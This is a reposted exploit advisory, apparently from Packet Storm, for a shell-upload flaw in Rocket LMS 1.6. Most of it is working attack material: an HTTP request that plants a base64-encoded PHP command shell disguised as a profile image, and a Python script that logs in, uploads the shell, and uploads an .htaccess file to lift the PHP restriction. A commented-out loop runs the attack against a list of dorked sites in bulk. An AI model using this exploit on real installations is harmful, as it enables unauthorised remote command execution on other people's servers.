Security
Headlines
HeadlinesLatestCVEs

Headline

Rocket LMS 1.6 Shell Upload

Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

Packet Storm
#csrf#vulnerability#web#windows#apple#ubuntu#linux#js#java#php#auth#chrome#webkit#ssl
# Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket:    def __init__(self,ssl,host,port,email,password,file):        self._url_to_upload = "/panel/setting"        self._url_to_login = "/login"        self.host = host        self.port = port        self.ssl = ssl        self.email = email        self.password = password        self.file = file    def get_csrf_token(self,client,URL):               fromt = client.get(URL)          if 'XSRF-TOKEN' in client.cookies:                csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]            return csrftoken        else:               print("Error while fetching token")            return    def login(self):        client = requests.session()        if self.ssl == True:            ssl= "https://"        else:            ssl= "http://"        URL = str(ssl+self.host+":"+self.port+self._url_to_login)        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)        csrftoken = self.get_csrf_token(client,URL)        fromt = client.get(URL)  # sets cookie              login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')        r = client.post(URL, data=login_data, cookies=client.cookies)                   self.upload_shell(client,URL2)        self.upload_htaccess(client,URL2)    def upload_shell(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)        with open(self.file,"r") as payload:            to_base64 = payload.read()                         to_base64 = str(to_base64).encode("utf-8")            base64_encoded_data=  base64.b64encode(to_base64)            base64_encoded_data = str(base64_encoded_data)[:-1]            base64_encoded_data = str(base64_encoded_data)[2:]                        string = "data:image/php;base64,"+str(base64_encoded_data)            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")            r = client.post(URL, data=data, cookies=client.cookies)            print(r.status_code)            if r.status_code == 200:                print("sent and uploaded shell :"+URL+"\n")            else:                 print("couldn't upload shell")         def upload_htaccess(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)           string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")        r = client.post(URL, data=data, cookies=client.cookies)        print(r.status_code)        if r.status_code == 200:            print("sent and uploaded htaccess:"+URL+"\n")            print("Go and rename file in filemanager on website")        else:             print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","[email protected]","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:#     with open("sites.txt","r") as urls:#         url = urls.readlines()#         ssl = True#         port = 443#         for line in url:            #             try:#                 if "sslyok" in line:#                     port = 80#                     ssl = False#                 line = str(line.rstrip('%0a'))                #                 print("trying:"+line)#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"[email protected]","student" ,"/home/mm1nd/Desktop/shell.txt")#                 elon.login()#                 time.sleep(1)    #             except Exception:#                 #traceback.print_exc()#                 print("atamadim")                #             finally:#                 print("okey")# except Exception:#                 print("atamadim")

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6